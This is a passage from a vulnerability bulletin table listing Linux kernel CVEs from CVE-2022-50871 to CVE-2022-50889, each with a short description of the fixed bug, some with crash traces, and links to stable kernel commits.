https://git.kernel.org/stable/c/c2fa91abf22a705cf02f886cd99cff41f4ceda60 https://git.kernel.org/stable/c/f2167f10fcca68ab9ae3f8d94d2c704c5541ac69 https://git.kernel.org/stable/c/d8939315b7342860df143afe0adda6212cdd3193 https://git.kernel.org/stable/c/698e682c849e356fb47a8be47ca8baa817cf31e0 https://git.kernel.org/stable/c/464d10e8d797454e16a173ef1292a446b2adf21c https://git.kernel.org/stable/c/ed2213bfb192ab51f09f12e9b49b5d482c6493f3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath11k: Fix qmi_msg_handler data structure initialization qmi_msg_handler is required to be null terminated by QMI module. There might be a case where a handler for a msg id is not present in the handlers array which can lead to infinite loop while searching the handler and therefore out of bound access in qmi_invoke_handler(). Hence update the initialization in qmi_msg_handler data structure. Tested-on: IPQ8074 hw2.0 AHB WLAN.HK.2.5.0.1-01100-QCAHKSWPL_SILICONZ-1 | 2025-12-30 | not yet calculated | CVE-2022-50871 | https://git.kernel.org/stable/c/d5d71de448f36e34592f7c81b5e300d3e8dbb735 https://git.kernel.org/stable/c/a10e1530c424bb277b4edc7def0195857a548495 https://git.kernel.org/stable/c/ed3725e15a154ebebf44e0c34806c57525483f92 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ARM: OMAP2+: Fix memory leak in realtime_counter_init() The "sys_clk" resource is malloced by clk_get(), it is not released when the function return. | 2025-12-30 | not yet calculated | CVE-2022-50872 | https://git.kernel.org/stable/c/5f9aedabce3404dd8bb769822fc11317c55fbdc1 https://git.kernel.org/stable/c/e3a6af3059e4f83d1a986a3180eb1e04f99c9e64 https://git.kernel.org/stable/c/8041f9a2a958277f95926560dc85910aecd48c0b https://git.kernel.org/stable/c/4862c41d5f3bee1ec64c979c82bd8cfe96b78f7d https://git.kernel.org/stable/c/10fcdad2b9f3f424873714eb8713a3e6f7ab84bb https://git.kernel.org/stable/c/98df4bdf3b010c23cc3c542d0c303016e5fceb40 https://git.kernel.org/stable/c/4f7ad1b08533247c4bf29217ba499ea4138cc2c1 https://git.kernel.org/stable/c/ed8167cbf65c2b6ff6faeb0f96ded4d6d581e1ac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vdpa/vp_vdpa: fix kfree a wrong pointer in vp_vdpa_remove In vp_vdpa_remove(), the code kfree(&vp_vdpa_mgtdev->mgtdev.id_table) uses a reference of pointer as the argument of kfree, which is the wrong pointer and then may hit crash like this: Unable to handle kernel paging request at virtual address 00ffff003363e30c Internal error: Oops: 96000004 [#1] SMP Call trace: rb_next+0x20/0x5c ext4_readdir+0x494/0x5c4 [ext4] iterate_dir+0x168/0x1b4 __se_sys_getdents64+0x68/0x170 __arm64_sys_getdents64+0x24/0x30 el0_svc_common.constprop.0+0x7c/0x1bc do_el0_svc+0x2c/0x94 el0_svc+0x20/0x30 el0_sync_handler+0xb0/0xb4 el0_sync+0x160/0x180 Code: 54000220 f9400441 b4000161 aa0103e0 (f9400821) SMP: stopping secondary CPUs Starting crashdump kernel... | 2025-12-30 | not yet calculated | CVE-2022-50873 | https://git.kernel.org/stable/c/8fe12680b2c731201519935013ec9219c93ec540 https://git.kernel.org/stable/c/6ccc891f36d0c20ee220551caabdcd3886ec584b https://git.kernel.org/stable/c/ed843d6ed7310a27cf7c8ee0a82a482eed0cb4a6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/erdma: Fix refcount leak in erdma_mmap rdma_user_mmap_entry_get() take reference, we should release it when not need anymore, add the missing rdma_user_mmap_entry_put() in the error path to fix it. | 2025-12-30 | not yet calculated | CVE-2022-50874 | https://git.kernel.org/stable/c/8372207b009d6abdd60bb05624640bd86386599f https://git.kernel.org/stable/c/410f0f46ffca4d0102470c1e0c747ecfece4204c https://git.kernel.org/stable/c/ee84146c05ad2316b9a7222d0ec4413e0bf30eeb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: of: overlay: fix null pointer dereferencing in find_dup_cset_node_entry() and find_dup_cset_prop() When kmalloc() fail to allocate memory in kasprintf(), fn_1 or fn_2 will be NULL, and strcmp() will cause null pointer dereference. | 2025-12-30 | not yet calculated | CVE-2022-50875 | https://git.kernel.org/stable/c/9ec5781879b4535ad59b5354b385825378e45618 https://git.kernel.org/stable/c/2b4af99b44861646013821019dd13a4ac48c0219 https://git.kernel.org/stable/c/ce1b3a41e7964cb8dd56a702a95dd90ad27f51cd https://git.kernel.org/stable/c/ab5bb7bbacf531de8e32912cc2e21f906113cee8 https://git.kernel.org/stable/c/71d88c7453ec3d2ceff98e18ce4d6354abd3b5b6 https://git.kernel.org/stable/c/ee9d7a0e754568180a2f8ebc4aad226278a9116f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: musb: Fix musb_gadget.c rxstate overflow bug The usb function device call musb_gadget_queue() adds the passed request to musb_ep::req_list,If the (request->length > musb_ep->packet_sz) and (is_buffer_mapped(req) return false),the rxstate() will copy all data in fifo to request->buf which may cause request->buf out of bounds. Fix it by add the length check : fifocnt = min_t(unsigned, request->length - request->actual, fifocnt); | 2025-12-30 | not yet calculated | CVE-2022-50876 | https://git.kernel.org/stable/c/826f84ab04a5cafe484ea9c2c85a3930068e5cb7 https://git.kernel.org/stable/c/a1008c8b9f357691ce6a8fdb8f157aecb2d79167 https://git.kernel.org/stable/c/7c80f3a918ba9aa26fb699ee887064ec3af0396a https://git.kernel.org/stable/c/d6afcab1b48f4051211c50145b9e91be3b1b42c9 https://git.kernel.org/stable/c/acf0006f2b2b2ca672988875fd154429aafb2a9b https://git.kernel.org/stable/c/3c84c7f592c4ba38f54ddaddd0115acc443025db https://git.kernel.org/stable/c/a9ccd2ab1becf5dcb6d57e9fcd981f5eaa606c96 https://git.kernel.org/stable/c/523313881f0aa5cbbdb548ce575b6e58b202bd76 https://git.kernel.org/stable/c/eea4c860c3b366369eff0489d94ee4f0571d467d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: broadcom: bcm4908_enet: update TX stats after actual transmission Queueing packets doesn't guarantee their transmission. Update TX stats after hardware confirms consuming submitted data. This also fixes a possible race and NULL dereference. bcm4908_enet_start_xmit() could try to access skb after freeing it in the bcm4908_enet_poll_tx(). | 2025-12-30 | not yet calculated | CVE-2022-50877 | https://git.kernel.org/stable/c/c9589e18a60c55c76772a38117ef9a16b942e56b https://git.kernel.org/stable/c/2adedc80faec243ede55355e57142110d6f46e08 https://git.kernel.org/stable/c/ef3556ee16c68735ec69bd08df41d1cd83b14ad3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gpu: lontium-lt9611: Fix NULL pointer dereference in lt9611_connector_init() A NULL check for bridge->encoder shows that it may be NULL, but it already been dereferenced on all paths leading to the check. 812 if (!bridge->encoder) { Dereference the pointer bridge->encoder. 810 drm_connector_attach_encoder(<9611->connector, bridge->encoder); | 2025-12-30 | not yet calculated | CVE-2022-50878 | https://git.kernel.org/stable/c/3959e8faf8bf6bea619e8856c736db64e6eced37 https://git.kernel.org/stable/c/a29f7427041a943484f916157c43c46d3bbf25d4 https://git.kernel.org/stable/c/b2e4323e0020213f44dca6ffc815d66aef39f6f6 https://git.kernel.org/stable/c/912f84e15e94ab87f5a7156aa1870090373d8304 https://git.kernel.org/stable/c/ef8886f321c5dab8124b9153d25afa2a71d05323 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: objtool: Fix SEGFAULT find_insn() will return NULL in case of failure. Check insn in order to avoid a kernel Oops for NULL pointer dereference. | 2025-12-30 | not yet calculated | CVE-2022-50879 | https://git.kernel.org/stable/c/418ef921cce2d7415fab7e3e93529227f239e4bb https://git.kernel.org/stable/c/0af0e115ff59d638f45416a004cdd8edb38db40c https://git.kernel.org/stable/c/23a249b1185cdd5bfb6971d1608ba49e589f2288 https://git.kernel.org/stable/c/38b9415abbd703438ebbc6fb74990bd0fbddc5b9 https://git.kernel.org/stable/c/fcee8a2d4db404a93e690d79e7273b6ef9d33575 https://git.kernel.org/stable/c/efb11fdb3e1a9f694fa12b70b21e69e55ec59c36 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath10k: add peer map clean up for peer delete in ath10k_sta_state() When peer delete failed in a disconnect operation, use-after-free detected by KFENCE in below log. It is because for each vdev_id and address, it has only one struct ath10k_peer, it is allocated in ath10k_peer_map_event(). When connected to an AP, it has more than one HTT_T2H_MSG_TYPE_PEER_MAP reported from firmware, then the array peer_map of struct ath10k will be set muti-elements to the same ath10k_peer in ath10k_peer_map_event(). When peer delete failed in ath10k_sta_state(), the ath10k_peer will be free for the 1st peer id in array peer_map of struct ath10k, and then use-after-free happened for the 2nd peer id because they map to the same ath10k_peer. And clean up all peers in array peer_map for the ath10k_peer, then user-after-free disappeared peer map event log: [ 306.911021] wlan0: authenticate with b0:2a:43:e6:75:0e [ 306.957187] ath10k_pci 0000:01:00.0: mac vdev 0 peer create b0:2a:43:e6:75:0e (new sta) sta 1 / 32 peer 1 / 33 [ 306.957395] ath10k_pci 0000:01:00.0: htt peer map vdev 0 peer b0:2a:43:e6:75:0e id 246 [ 306.957404] ath10k_pci 0000:01:00.0: htt peer map vdev 0 peer b0:2a:43:e6:75:0e id 198 [ 306.986924] ath10k_pci 0000:01:00.0: htt peer map vdev 0 peer b0:2a:43:e6:75:0e id 166 peer unmap event log: [ 435.715691] wlan0: deauthenticating from b0:2a:43:e6:75:0e by local choice (Reason: 3=DEAUTH_LEAVING) [ 435.716802] ath10k_pci 0000:01:00.0: mac vdev 0 peer delete b0:2a:43:e6:75:0e sta ffff990e0e9c2b50 (sta gone) [ 435.717177] ath10k_pci 0000:01:00.0: htt peer unmap vdev 0 peer b0:2a:43:e6:75:0e id 246 [ 435.717186] ath10k_pci 0000:01:00.0: htt peer unmap vdev 0 peer b0:2a:43:e6:75:0e id 198 [ 435.717193] ath10k_pci 0000:01:00.0: htt peer unmap vdev 0 peer b0:2a:43:e6:75:0e id 166 use-after-free log: [21705.888627] wlan0: deauthenticating from d0:76:8f:82:be:75 by local choice (Reason: 3=DEAUTH_LEAVING) [21713.799910] ath10k_pci 0000:01:00.0: failed to delete peer d0:76:8f:82:be:75 for vdev 0: -110 [21713.799925] ath10k_pci 0000:01:00.0: found sta peer d0:76:8f:82:be:75 (ptr 0000000000000000 id 102) entry on vdev 0 after it was supposedly removed [21713.799968] ================================================================== [21713.799991] BUG: KFENCE: use-after-free read in ath10k_sta_state+0x265/0xb8a [ath10k_core] [21713.799991] [21713.799997] Use-after-free read at 0x00000000abe1c75e (in kfence-#69): [21713.800010] ath10k_sta_state+0x265/0xb8a [ath10k_core] [21713.800041] drv_sta_state+0x115/0x677 [mac80211] [21713.800059] __sta_info_destroy_part2+0xb1/0x133 [mac80211] [21713.800076] __sta_info_flush+0x11d/0x162 [mac80211] [21713.800093] ieee80211_set_disassoc+0x12d/0x2f4 [mac80211] [21713.800110] ieee80211_mgd_deauth+0x26c/0x29b [mac80211] [21713.800137] cfg80211_mlme_deauth+0x13f/0x1bb [cfg80211] [21713.800153] nl80211_deauthenticate+0xf8/0x121 [cfg80211] [21713.800161] genl_rcv_msg+0x38e/0x3be [21713.800166] netlink_rcv_skb+0x89/0xf7 [21713.800171] genl_rcv+0x28/0x36 [21713.800176] netlink_unicast+0x179/0x24b [21713.800181] netlink_sendmsg+0x3a0/0x40e [21713.800187] sock_sendmsg+0x72/0x76 [21713.800192] ____sys_sendmsg+0x16d/0x1e3 [21713.800196] ___sys_sendmsg+0x95/0xd1 [21713.800200] __sys_sendmsg+0x85/0xbf [21713.800205] do_syscall_64+0x43/0x55 [21713.800210] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [21713.800213] [21713.800219] kfence-#69: 0x000000009149b0d5-0x000000004c0697fb, size=1064, cache=kmalloc-2k [21713.800219] [21713.800224] allocated by task 13 on cpu 0 at 21705.501373s: [21713.800241] ath10k_peer_map_event+0x7e/0x154 [ath10k_core] [21713.800254] ath10k_htt_t2h_msg_handler+0x586/0x1039 [ath10k_core] [21713.800265] ath10k_htt_htc_t2h_msg_handler+0x12/0x28 [ath10k_core] [21713.800277] ath10k_htc_rx_completion_handler+0x14c/0x1b5 [ath10k_core] [21713.800283] ath10k_pci_process_rx_cb+0x195/0x1d ---truncated--- | 2025-12-30 | not yet calculated | CVE-2022-50880 | https://git.kernel.org/stable/c/15604ab67179ae27ea3c7fb24b6df32b143257c4 https://git.kernel.org/stable/c/2d6259715c9597a6cfa25db8911683eb0073b1c6 https://git.kernel.org/stable/c/f12fc305c127bd07bb50373e29c6037696f916a8 https://git.kernel.org/stable/c/4494ec1c0bb850eaa80fed98e5b041d961011d3e https://git.kernel.org/stable/c/08faf07717be0c88b02b5aa45aad2225dfcdd2dc https://git.kernel.org/stable/c/54a3201f3c1ff813523937da78b5fa7649dbab71 https://git.kernel.org/stable/c/2bf916418d2141b810c40812433ab4ecfd3c2934 https://git.kernel.org/stable/c/38245f2d62cd4d1f38a763a7b4045ab4565b30a0 https://git.kernel.org/stable/c/f020d9570a04df0762a2ac5c50cf1d8c511c9164 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath9k: Fix use-after-free in ath9k_hif_usb_disconnect() This patch fixes a use-after-free in ath9k that occurs in ath9k_hif_usb_disconnect() when ath9k_destroy_wmi() is trying to access 'drv_priv' that has already been freed by ieee80211_free_hw(), called by ath9k_htc_hw_deinit(). The patch moves ath9k_destroy_wmi() before ieee80211_free_hw(). Note that urbs from the driver should be killed before freeing 'wmi' with ath9k_destroy_wmi() as their callbacks will access 'wmi'. Found by a modified version of syzkaller. ================================================================== BUG: KASAN: use-after-free in ath9k_destroy_wmi+0x38/0x40 Read of size 8 at addr ffff8881069132a0 by task kworker/0:1/7 CPU: 0 PID: 7 Comm: kworker/0:1 Tainted: G O 5.14.0+ #131 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.1-0-ga5cab58e9a3f-prebuilt.qemu.org 04/01/2014 Workqueue: usb_hub_wq hub_event Call Trace: dump_stack_lvl+0x8e/0xd1 print_address_description.constprop.0.cold+0x93/0x334 ? ath9k_destroy_wmi+0x38/0x40 ? ath9k_destroy_wmi+0x38/0x40 kasan_report.cold+0x83/0xdf ? ath9k_destroy_wmi+0x38/0x40 ath9k_destroy_wmi+0x38/0x40 ath9k_hif_usb_disconnect+0x329/0x3f0 ? ath9k_hif_usb_suspend+0x120/0x120 ? usb_disable_interface+0xfc/0x180 usb_unbind_interface+0x19b/0x7e0 ? usb_autoresume_device+0x50/0x50 device_release_driver_internal+0x44d/0x520 bus_remove_device+0x2e5/0x5a0 device_del+0x5b2/0xe30 ? __device_link_del+0x370/0x370 ? usb_remove_ep_devs+0x43/0x80 ? remove_intf_ep_devs+0x112/0x1a0 usb_disable_device+0x1e3/0x5a0 usb_disconnect+0x267/0x870 hub_event+0x168d/0x3950 ? rcu_read_lock_sched_held+0xa1/0xd0 ? hub_port_debounce+0x2e0/0x2e0 ? check_irq_usage+0x860/0xf20 ? drain_workqueue+0x281/0x360 ? lock_release+0x640/0x640 ? rcu_read_lock_sched_held+0xa1/0xd0 ? rcu_read_lock_bh_held+0xb0/0xb0 ? lockdep_hardirqs_on_prepare+0x273/0x3e0 process_one_work+0x92b/0x1460 ? pwq_dec_nr_in_flight+0x330/0x330 ? rwlock_bug.part.0+0x90/0x90 worker_thread+0x95/0xe00 ? __kthread_parkme+0x115/0x1e0 ? process_one_work+0x1460/0x1460 kthread+0x3a1/0x480 ? set_kthread_struct+0x120/0x120 ret_from_fork+0x1f/0x30 The buggy address belongs to the page: page:ffffea00041a44c0 refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x106913 flags: 0x200000000000000(node=0|zone=2) raw: 0200000000000000 0000000000000000 dead000000000122 0000000000000000 raw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000 page dumped because: kasan: bad access detected page_owner tracks the page as freed page last allocated via order 3, migratetype Unmovable, gfp_mask 0x40dc0(GFP_KERNEL|__GFP_COMP|__GFP_ZERO), pid 7, ts 38347963444, free_ts 41399957635 prep_new_page+0x1aa/0x240 get_page_from_freelist+0x159a/0x27c0 __alloc_pages+0x2da/0x6a0 alloc_pages+0xec/0x1e0 kmalloc_order+0x39/0xf0 kmalloc_order_trace+0x19/0x120 __kmalloc+0x308/0x390 wiphy_new_nm+0x6f5/0x1dd0 ieee80211_alloc_hw_nm+0x36d/0x2230 ath9k_htc_probe_device+0x9d/0x1e10 ath9k_htc_hw_init+0x34/0x50 ath9k_hif_usb_firmware_cb+0x25f/0x4e0 request_firmware_work_func+0x131/0x240 process_one_work+0x92b/0x1460 worker_thread+0x95/0xe00 kthread+0x3a1/0x480 page last free stack trace: free_pcp_prepare+0x3d3/0x7f0 free_unref_page+0x1e/0x3d0 device_release+0xa4/0x240 kobject_put+0x186/0x4c0 put_device+0x20/0x30 ath9k_htc_disconnect_device+0x1cf/0x2c0 ath9k_htc_hw_deinit+0x26/0x30 ath9k_hif_usb_disconnect+0x2d9/0x3f0 usb_unbind_interface+0x19b/0x7e0 device_release_driver_internal+0x44d/0x520 bus_remove_device+0x2e5/0x5a0 device_del+0x5b2/0xe30 usb_disable_device+0x1e3/0x5a0 usb_disconnect+0x267/0x870 hub_event+0x168d/0x3950 process_one_work+0x92b/0x1460 Memory state around the buggy address: ffff888106913180: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ffff888106913200: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff >ffff888 ---truncated--- | 2025-12-30 | not yet calculated | CVE-2022-50881 | https://git.kernel.org/stable/c/99ff971b62e5bd5dee65bbe9777375206f5db791 https://git.kernel.org/stable/c/634a5471a6bd774c0d0fa448dfa6ec593e899ec9 https://git.kernel.org/stable/c/1f137c634a8c8faba648574f687805641e62f92e https://git.kernel.org/stable/c/de15e8bbd9eb26fe94a06d0ec7be82dc490eb729 https://git.kernel.org/stable/c/f099c5c9e2ba08a379bd354a82e05ef839ae29ac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: uvcvideo: Fix memory leak in uvc_gpio_parse Previously the unit buffer was allocated before checking the IRQ for privacy GPIO. In case of error, the unit buffer was leaked. Allocate the unit buffer after the IRQ to avoid it. Addresses-Coverity-ID: 1474639 ("Resource leak") | 2025-12-30 | not yet calculated | CVE-2022-50882 | https://git.kernel.org/stable/c/6c5da92103bddd1f0c36cb69446ff7cae3043986 https://git.kernel.org/stable/c/deb8f32ae4b10a48c433f2da1b1159521ac24674 https://git.kernel.org/stable/c/4a7ae8d982a89b3b43b36ec7d62a2e3d06ffa16e https://git.kernel.org/stable/c/f0f078457f18f10696888f8d0e6aba9deb9cde92 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Prevent decl_tag from being referenced in func_proto arg Syzkaller managed to hit another decl_tag issue: btf_func_proto_check kernel/bpf/btf.c:4506 [inline] btf_check_all_types kernel/bpf/btf.c:4734 [inline] btf_parse_type_sec+0x1175/0x1980 kernel/bpf/btf.c:4763 btf_parse kernel/bpf/btf.c:5042 [inline] btf_new_fd+0x65a/0xb00 kernel/bpf/btf.c:6709 bpf_btf_load+0x6f/0x90 kernel/bpf/syscall.c:4342 __sys_bpf+0x50a/0x6c0 kernel/bpf/syscall.c:5034 __do_sys_bpf kernel/bpf/syscall.c:5093 [inline] __se_sys_bpf kernel/bpf/syscall.c:5091 [inline] __x64_sys_bpf+0x7c/0x90 kernel/bpf/syscall.c:5091 do_syscall_64+0x54/0x70 arch/x86/entry/common.c:48 This seems similar to commit ea68376c8bed ("bpf: prevent decl_tag from being referenced in func_proto") but for the argument. | 2025-12-30 | not yet calculated | CVE-2022-50883 | https://git.kernel.org/stable/c/3f3d54962a032581996edda8e6bcbf7a30371234 https://git.kernel.org/stable/c/e6d276dcc9204f95632580c43d66c52ca502d7ec https://git.kernel.org/stable/c/f17472d4599697d701aa239b4c475a506bccfd19 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm: Prevent drm_copy_field() to attempt copying a NULL pointer There are some struct drm_driver fields that are required by drivers since drm_copy_field() attempts to copy them to user-space via DRM_IOCTL_VERSION. But it can be possible that a driver has a bug and did not set some of the fields, which leads to drm_copy_field() attempting to copy a NULL pointer: [ +10.395966] Unable to handle kernel access to user memory outside uaccess routines at virtual address 0000000000000000 [ +0.010955] Mem abort info: [ +0.002835] ESR = 0x0000000096000004 [ +0.003872] EC = 0x25: DABT (current EL), IL = 32 bits [ +0.005395] SET = 0, FnV = 0 [ +0.003113] EA = 0, S1PTW = 0 [ +0.003182] FSC = 0x04: level 0 translation fault [ +0.004964] Data abort info: [ +0.002919] ISV = 0, ISS = 0x00000004 [ +0.003886] CM = 0, WnR = 0 [ +0.003040] user pgtable: 4k pages, 48-bit VAs, pgdp=0000000115dad000 [ +0.006536] [0000000000000000] pgd=0000000000000000, p4d=0000000000000000 [ +0.006925] Internal error: Oops: 96000004 [#1] SMP ... [ +0.011113] pstate: 80400005 (Nzcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ +0.007061] pc : __pi_strlen+0x14/0x150 [ +0.003895] lr : drm_copy_field+0x30/0x1a4 [ +0.004156] sp : ffff8000094b3a50 [ +0.003355] x29: ffff8000094b3a50 x28: ffff8000094b3b70 x27: 0000000000000040 [ +0.007242] x26: ffff443743c2ba00 x25: 0000000000000000 x24: 0000000000000040 [ +0.007243] x23: ffff443743c2ba00 x22: ffff8000094b3b70 x21: 0000000000000000 [ +0.007241] x20: 0000000000000000 x19: ffff8000094b3b90 x18: 0000000000000000 [ +0.007241] x17: 0000000000000000 x16: 0000000000000000 x15: 0000aaab14b9af40 [ +0.007241] x14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000 [ +0.007239] x11: 0000000000000000 x10: 0000000000000000 x9 : ffffa524ad67d4d8 [ +0.007242] x8 : 0101010101010101 x7 : 7f7f7f7f7f7f7f7f x6 : 6c6e6263606e7141 [ +0.007239] x5 : 0000000000000000 x4 : 0000000000000000 x3 : 0000000000000000 [ +0.007241] x2 : 0000000000000000 x1 : ffff8000094b3b90 x0 : 0000000000000000 [ +0.007240] Call trace: [ +0.002475] __pi_strlen+0x14/0x150 [ +0.003537] drm_version+0x84/0xac [ +0.003448] drm_ioctl_kernel+0xa8/0x16c [ +0.003975] drm_ioctl+0x270/0x580 [ +0.003448] __arm64_sys_ioctl+0xb8/0xfc [ +0.003978] invoke_syscall+0x78/0x100 [ +0.003799] el0_svc_common.constprop.0+0x4c/0xf4 [ +0.004767] do_el0_svc+0x38/0x4c [ +0.003357] el0_svc+0x34/0x100 [ +0.003185] el0t_64_sync_handler+0x11c/0x150 [ +0.004418] el0t_64_sync+0x190/0x194 [ +0.003716] Code: 92402c04 b200c3e8 f13fc09f 5400088c (a9400c02) [ +0.006180] ---[ end trace 0000000000000000 ]--- | 2025-12-30 | not yet calculated | CVE-2022-50884 | https://git.kernel.org/stable/c/d213914386a0ede76a4549b41de30192fb92c595 https://git.kernel.org/stable/c/ee9885cd936aad88f84d0cf90bf9a70e83e42a97 https://git.kernel.org/stable/c/8052612b9d08048ebbebcb572894670b4ac07d2f https://git.kernel.org/stable/c/cdde55f97298e5bb9af6d41c9303a3ec545a370e https://git.kernel.org/stable/c/c28a8082b25ce4ec94999e10a30c50d20bd44a25 https://git.kernel.org/stable/c/ca163e389f0ae096a4e1e19f0a95e60ed80b4e31 https://git.kernel.org/stable/c/2d6708ea5c2033ff53267feff1876a717689989f https://git.kernel.org/stable/c/6cf5e9356b2d856403ee480f987f3ea64dbf8d8c https://git.kernel.org/stable/c/f6ee30407e883042482ad4ad30da5eaba47872ee |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Fix NULL-ptr-deref in rxe_qp_do_cleanup() when socket create failed There is a null-ptr-deref when mount.cifs over rdma: BUG: KASAN: null-ptr-deref in rxe_qp_do_cleanup+0x2f3/0x360 [rdma_rxe] Read of size 8 at addr 0000000000000018 by task mount.cifs/3046 CPU: 2 PID: 3046 Comm: mount.cifs Not tainted 6.1.0-rc5+ #62 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-1.fc3 Call Trace: <TASK> dump_stack_lvl+0x34/0x44 kasan_report+0xad/0x130 rxe_qp_do_cleanup+0x2f3/0x360 [rdma_rxe] execute_in_process_context+0x25/0x90 __rxe_cleanup+0x101/0x1d0 [rdma_rxe] rxe_create_qp+0x16a/0x180 [rdma_rxe] create_qp.part.0+0x27d/0x340 ib_create_qp_kernel+0x73/0x160 rdma_create_qp+0x100/0x230 _smbd_get_connection+0x752/0x20f0 smbd_get_connection+0x21/0x40 cifs_get_tcp_session+0x8ef/0xda0 mount_get_conns+0x60/0x750 cifs_mount+0x103/0xd00 cifs_smb3_do_mount+0x1dd/0xcb0 smb3_get_tree+0x1d5/0x300 vfs_get_tree+0x41/0xf0 path_mount+0x9b3/0xdd0 __x64_sys_mount+0x190/0x1d0 do_syscall_64+0x35/0x80 entry_SYSCALL_64_after_hwframe+0x46/0xb0 The root cause of the issue is the socket create failed in rxe_qp_init_req(). So move the reset rxe_qp_do_cleanup() after the NULL ptr check. | 2025-12-30 | not yet calculated | CVE-2022-50885 | https://git.kernel.org/stable/c/ee24de095569935eba600f7735e8e8ddea5b418e https://git.kernel.org/stable/c/7340ca9f782be6fbe3f64a134dc112772764f766 https://git.kernel.org/stable/c/bd7106a6004f1077a365ca7f5a99c7a708e20714 https://git.kernel.org/stable/c/6bb5a62bfd624039b05157745c234068508393a9 https://git.kernel.org/stable/c/f64f08b9e6fb305a25dd75329e06ae342b9ce336 https://git.kernel.org/stable/c/5b924632d84a60bc0c7fe6e9bbbce99d03908957 https://git.kernel.org/stable/c/821f9a18210f6b9fd6792471714c799607b25db4 https://git.kernel.org/stable/c/f67376d801499f4fa0838c18c1efcad8840e550d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mmc: toshsd: fix return value check of mmc_add_host() mmc_add_host() may return error, if we ignore its return value, the memory that allocated in mmc_alloc_host() will be leaked and it will lead a kernel crash because of deleting not added device in the remove path. So fix this by checking the return value and goto error path which will call mmc_free_host(), besides, free_irq() also needs be called. | 2025-12-30 | not yet calculated | CVE-2022-50886 | https://git.kernel.org/stable/c/34ae492f8d172f0bd193c24cad588b35419ea47a https://git.kernel.org/stable/c/3329e7b7132ca727263fb0ee214cf52cc6dcaaad https://git.kernel.org/stable/c/4f6cb1c685f9e20a4a9fa565e442f5af4dad70ff https://git.kernel.org/stable/c/3dbb69a0242c31ea4c9eee22b1c41b515fe509a0 https://git.kernel.org/stable/c/aabbedcb6c9a72d12d35dc672e83f0c8064d8a61 https://git.kernel.org/stable/c/6444079767b68b1fbed0e7668081146e80dcb719 https://git.kernel.org/stable/c/647e370dd0ef7e212d8d014bda748e461eab2e8c https://git.kernel.org/stable/c/bfd77b194c94aefbde4efc30ddf8607dd9244672 https://git.kernel.org/stable/c/f670744a316ea983113a65313dcd387b5a992444 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: regulator: core: fix unbalanced of node refcount in regulator_dev_lookup() I got the the following report: OF: ERROR: memory leak, expected refcount 1 instead of 2, of_node_get()/of_node_put() unbalanced - destroy cset entry: attach overlay node /i2c/pmic@62/regulators/exten In of_get_regulator(), the node is returned from of_parse_phandle() with refcount incremented, after using it, of_node_put() need be called. | 2025-12-30 | not yet calculated | CVE-2022-50887 | https://git.kernel.org/stable/c/0e88505ac0a6ae97746bcdbd4b042ee9f20455ae https://git.kernel.org/stable/c/4dfcf5087db9a34a300d6b99009232d4537c3e6a https://git.kernel.org/stable/c/3ac888db0f67813d91373a9a61c840f815cd4ec9 https://git.kernel.org/stable/c/d39937f8de641c44a337cec4a2e5d3e8add20a7d https://git.kernel.org/stable/c/f48c474efe05cf9ce5e535b5e0ddd710e963936c https://git.kernel.org/stable/c/cda1895f3b7f324ece1614308a815a3994983b97 https://git.kernel.org/stable/c/2b93c58adddd98812ad928bbc2063038f3df1ffd https://git.kernel.org/stable/c/2f98469c3141f8e42ba11075a273fb795bbad57f https://git.kernel.org/stable/c/f2b41b748c19962b82709d9f23c6b2b0ce9d2f91 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: remoteproc: qcom: q6v5: Fix potential null-ptr-deref in q6v5_wcss_init_mmio() q6v5_wcss_init_mmio() will call platform_get_resource_byname() that may fail and return NULL. devm_ioremap() will use res->start as input, which may causes null-ptr-deref. Check the ret value of platform_get_resource_byname() to avoid the null-ptr-deref. | 2025-12-30 | not yet calculated | CVE-2022-50888 | https://git.kernel.org/stable/c/098ebb9089c4eedea09333f912d105fa63377496 https://git.kernel.org/stable/c/3afa88ae9911b65702a3aca9d92ea23fe496e56f https://git.kernel.org/stable/c/0903a87490a9ed456ac765a84dcc484c1ee42c32 https://git.kernel.org/stable/c/f360e2b275efbb745ba0af8b47d9ef44221be586 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm integrity: Fix UAF in dm_integrity_dtr() Dm_integrity also has the same UAF problem when dm_resume() and dm_destroy() are concurrent. Therefore, cancelling timer again in dm_integrity_dtr(). | 2025-12-30 | not yet calculated | CVE-2022-50889 | https://git.kernel.org/stable/c/792e51aac376cfb5bd527c2a30826223b82dd177 https://git.kernel.org/stable/c/a506b5c92757b034034ef683e667bffc456c600b https://git.kernel.org/stable/c/9215b25f2e105032114e9b92c9783a2a84ee8af9 https://git.kernel.org/stable/c/9f8e1e54a3a424c6c4fb8742e094789d3ec91e42 https://git.kernel.org/stable/c/b6c93cd61afab061d80cc842333abca97b289774 https://git.kernel.org/stable/c/f50cb2cbabd6c4a60add93d72451728f86e4791c |
